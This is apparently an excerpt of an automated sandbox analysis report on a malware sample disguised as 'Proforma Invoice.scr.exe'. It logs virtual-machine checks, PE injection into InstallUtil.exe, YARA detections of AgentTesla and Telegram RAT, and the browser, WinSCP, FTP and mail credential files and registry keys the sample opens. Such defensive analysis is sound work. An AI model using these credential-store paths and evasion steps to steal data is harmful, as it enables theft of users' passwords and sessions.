                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596317Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596180Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596030Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595898Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595653Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594616Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594498Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594389Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594171Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99780Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99671Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99561Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99451Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99343Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99203Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 99013Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98894Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98424Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98273Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98156Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 98046Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97937Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97827Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97718Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97609Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97499Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97390Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97281Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97171Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 97062Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96952Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96843Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96734Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96624Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96515Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96406Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96296Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96187Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 96070Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 95937Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 95812Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 95702Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 95588Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 95470Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599655Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598421Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597297Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595843Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594937Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594718Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594500Jump to behavior
                      Source: EncoderFallback.exe, 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2453582503.0000000000981000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                      Source: EncoderFallback.exe, 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                      Source: wscript.exe, 00000005.00000002.2588650747.000002E20E564000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\L5
                      Source: EncoderFallback.exe, 00000006.00000002.2750285335.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3538666880.0000000005CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: InstallUtil.exe, 00000003.00000002.2761171022.0000000004F33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 440000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 637008Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\EncoderFallback.exe "C:\Users\user\AppData\Roaming\EncoderFallback.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice.scr.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeQueries volume information: C:\Users\user\AppData\Roaming\EncoderFallback.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3412, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5868, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3412, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5868, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
